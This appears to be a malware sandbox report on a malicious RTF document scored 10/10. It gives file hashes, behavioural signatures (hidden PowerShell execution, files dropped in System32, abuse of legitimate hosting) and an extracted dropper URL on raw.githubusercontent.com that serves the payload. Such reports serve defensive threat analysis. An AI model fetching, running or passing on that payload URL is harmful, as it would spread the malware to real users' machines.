Overview

overview

10

Static

static

1

33083e3d8c...be.rtf

windows7-x64

10

33083e3d8c...be.rtf

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    33083e3d8cad434bfff8cdb97032babe.rtf

  • Size

    75KB

  • Sample

    241003-lgghqawdlj

  • MD5

    33083e3d8cad434bfff8cdb97032babe

  • SHA1

    9defb395eda345c770a559ba6c46cba8226c2974

  • SHA256

    85ed27cc2b2264295dfc90a985944887053ffe9a79894914ea7f69e6a7de42e2

  • SHA512

    3750b71501d7412725484c72203a6440647e479fc43991199a2dfb5a4c0c5223ca9858864504d388fec1bbf94c539a1f2bcd56275698803f81bd4301e32ecf6a

  • SSDEEP

    384:+uNWTVICMS5DryYNfvw5vV8Sj7OYqsg4ozn67fT5PfSsMnCbh03MNyC0DAgqh5Ji:XMyGw5vV8fYq3pz6T5SBnC903P0gwtt8

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Targets

    • Target

      33083e3d8cad434bfff8cdb97032babe.rtf

    • Size

      75KB

    • MD5

      33083e3d8cad434bfff8cdb97032babe

    • SHA1

      9defb395eda345c770a559ba6c46cba8226c2974

    • SHA256

      85ed27cc2b2264295dfc90a985944887053ffe9a79894914ea7f69e6a7de42e2

    • SHA512

      3750b71501d7412725484c72203a6440647e479fc43991199a2dfb5a4c0c5223ca9858864504d388fec1bbf94c539a1f2bcd56275698803f81bd4301e32ecf6a

    • SSDEEP

      384:+uNWTVICMS5DryYNfvw5vV8Sj7OYqsg4ozn67fT5PfSsMnCbh03MNyC0DAgqh5Ji:XMyGw5vV8fYq3pz6T5SBnC903P0gwtt8

    Score
    10/10
    discoveryexecution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks